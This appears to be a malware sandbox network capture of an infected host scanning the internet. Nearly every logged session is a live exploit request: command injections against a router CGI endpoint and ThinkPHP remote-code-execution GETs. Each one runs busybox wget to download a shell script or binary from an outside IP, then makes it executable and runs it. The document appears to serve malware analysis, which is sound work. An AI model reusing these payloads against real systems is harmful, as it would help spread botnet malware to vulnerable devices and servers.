Feb 14, 2024 09:30:49.550522089 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:50.231786966 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:51.575741053 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:54.359736919 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:59.735518932 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:31:10.487227917 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:31:32.502583027 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:32:15.509438038 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
865	192.168.2.15	51674	95.101.175.213	80

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:50.097654104 CET	331	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 14, 2024 09:30:50.299680948 CET	480	IN	HTTP/1.0 400 Bad Request Server: AkamaiGHost Mime-Version: 1.0 Content-Type: text/html Content-Length: 258 Expires: Wed, 14 Feb 2024 08:30:50 GMT Date: Wed, 14 Feb 2024 08:30:50 GMT Connection: close Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 34 36 64 65 34 35 36 38 26 23 34 36 3b 31 37 30 37 38 39 39 34 35 30 26 23 34 36 3b 32 66 65 30 30 34 33 61 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http://%5bNo%20Host%5d/index.php?", is invalid.<p>Reference #9.46de4568.1707899450.2fe0043a</BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
866	192.168.2.15	45082	95.214.144.203	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:50.329396963 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
867	192.168.2.15	50508	95.97.109.165	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:50.329463959 CET	326	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:50.546037912 CET	626	IN	HTTP/1.1 404 Content-Type: text/html;charset=utf-8 Content-Language: en Content-Length: 431 Date: Wed, 14 Feb 2024 08:30:50 GMT Keep-Alive: timeout=5 Connection: keep-alive Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 e2 80 93 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 62 6f 64 79 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 7d 20 68 31 2c 20 68 32 2c 20 68 33 2c 20 62 20 7b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 7d 20 68 31 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 32 70 78 3b 7d 20 68 32 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 3b 7d 20 68 33 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 7d 20 70 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 7d 20 61 20 7b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 7d 20 2e 6c 69 6e 65 20 7b 68 65 69 67 68 74 3a 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 62 6f 72 64 65 72 3a 6e 6f 6e 65 3b 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 e2 80 93 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!doctype html><html lang="en"><head><title>HTTP Status 404 Not Found</title><style type="text/css">body {font-family:Tahoma,Arial,sans-serif;} h1, h2, h3, b {color:white;background-color:#525D76;} h1 {font-size:22px;} h2 {font-size:16px;} h3 {font-size:14px;} p {font-size:12px;} a {color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><body><h1>HTTP Status 404 Not Found</h1></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
868	192.168.2.15	47714	95.100.245.131	80

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:50.491497993 CET	331	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 14, 2024 09:30:50.682971954 CET	480	IN	HTTP/1.0 400 Bad Request Server: AkamaiGHost Mime-Version: 1.0 Content-Type: text/html Content-Length: 258 Expires: Wed, 14 Feb 2024 08:30:50 GMT Date: Wed, 14 Feb 2024 08:30:50 GMT Connection: close Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 31 64 31 61 37 62 35 63 26 23 34 36 3b 31 37 30 37 38 39 39 34 35 30 26 23 34 36 3b 33 64 32 30 38 66 30 37 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http://%5bNo%20Host%5d/index.php?", is invalid.<p>Reference #9.1d1a7b5c.1707899450.3d208f07</BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
869	192.168.2.15	36494	95.101.203.212	80

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:50.503021002 CET	331	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 14, 2024 09:30:50.706319094 CET	479	IN	HTTP/1.0 400 Bad Request Server: AkamaiGHost Mime-Version: 1.0 Content-Type: text/html Content-Length: 257 Expires: Wed, 14 Feb 2024 08:30:50 GMT Date: Wed, 14 Feb 2024 08:30:50 GMT Connection: close Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 36 66 30 31 30 30 32 26 23 34 36 3b 31 37 30 37 38 39 39 34 35 30 26 23 34 36 3b 34 63 35 35 31 39 38 37 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http://%5bNo%20Host%5d/index.php?", is invalid.<p>Reference #9.6f01002.1707899450.4c551987</BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
870	192.168.2.15	54350	62.84.102.213	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:50.739670992 CET	326	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
871	192.168.2.15	60716	31.211.147.251	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:50.971307993 CET	326	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:51.205796957 CET	390	IN	HTTP/1.1 400 Bad Request Content-Type: text/html Server: httpd Date: Wed, 14 Feb 2024 08:30:51 GMT Connection: close Cache-Control: no-store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Pragma: no-cache Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 20 42 47 43 4f 4c 4f 52 3d 22 23 63 63 39 39 39 39 22 3e 3c 48 34 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 48 34 3e 0a 43 72 6f 73 73 20 53 69 74 65 20 41 63 74 69 6f 6e 20 64 65 74 65 63 74 65 64 21 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>400 Bad Request</TITLE></HEAD><BODY BGCOLOR="#cc9999"><H4>400 Bad Request</H4>Cross Site Action detected!</BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
872	192.168.2.15	40912	94.103.234.70	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:50.980083942 CET	326	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
873	192.168.2.15	59364	94.45.208.158	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:50.983556032 CET	326	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
874	192.168.2.15	36956	31.200.77.110	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:50.986861944 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
875	192.168.2.15	36502	94.120.31.32	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:50.987322092 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
876	192.168.2.15	56400	94.120.225.58	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:50.987504005 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
877	192.168.2.15	60044	94.123.110.17	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:50.988776922 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
878	192.168.2.15	60726	94.121.213.203	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:50.989002943 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
879	192.168.2.15	41078	62.29.80.199	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:50.989191055 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
880	192.168.2.15	60738	31.211.147.251	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:51.432976007 CET	427	IN	HTTP/1.1 408 Request Timeout Content-Type: text/html Server: httpd Date: Wed, 14 Feb 2024 08:30:51 GMT Connection: close Cache-Control: no-store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Pragma: no-cache Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 34 30 38 20 52 65 71 75 65 73 74 20 54 69 6d 65 6f 75 74 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 20 42 47 43 4f 4c 4f 52 3d 22 23 63 63 39 39 39 39 22 3e 3c 48 34 3e 34 30 38 20 52 65 71 75 65 73 74 20 54 69 6d 65 6f 75 74 3c 2f 48 34 3e 0a 4e 6f 20 72 65 71 75 65 73 74 20 61 70 70 65 61 72 65 64 20 77 69 74 68 69 6e 20 61 20 72 65 61 73 6f 6e 61 62 6c 65 20 74 69 6d 65 20 70 65 72 69 6f 64 2e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>408 Request Timeout</TITLE></HEAD><BODY BGCOLOR="#cc9999"><H4>408 Request Timeout</H4>No request appeared within a reasonable time period.</BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
881	192.168.2.15	46948	94.250.30.198	8080

Timestamp	Bytes transferred	Direction	Data
